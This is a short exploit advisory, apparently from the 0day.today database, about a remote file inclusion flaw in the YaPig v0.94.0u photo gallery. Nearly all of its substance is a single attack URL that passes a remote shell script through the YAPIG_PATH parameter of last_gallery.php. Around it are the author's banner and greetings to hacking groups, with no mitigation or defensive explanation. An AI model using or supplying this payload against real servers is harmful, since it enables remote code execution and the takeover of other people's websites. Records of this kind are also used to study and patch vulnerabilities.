id: 11735
date: 04/12/2010
title: YaPig v0.94.0u Remote File Inclusion Vulnerability
author: JiKo
cves: 

==================================================
YaPig v0.94.0u Remote File Inclusion Vulnerability
==================================================

  |=-----------------------------------------------------=|
  |=-------------=[  JIKO |No-exploit.Com|  ]=-----------=|
  |=-----------------------------------------------------=|
[~]-----------|00|
NAme    :JIKO (JAWAD)
Home    :No-exploit.Com
Mail    : !x!
[~]-----------|01|
    -{Script}
    name :YaPig V0.94.0u
    link :http://yapig.sourceforge.net/
 
[~]-----------|02|
    -{3xpl01t}
    http://no-exploit.com/last_gallery.php?YAPIG_PATH={Shell}
[~]-----------|03|
    -{Greetz}
    Cyber-Zone,HxH,Hussin X,ZaIdOoHxHaCkEr ,Stack,HiSoKa,The SadHacker,SkuLL-HacKeR ,Dr.NaNo
    |No-Exploit.com Members
-------------------------------------



#  0day.today [2023-03-22]  #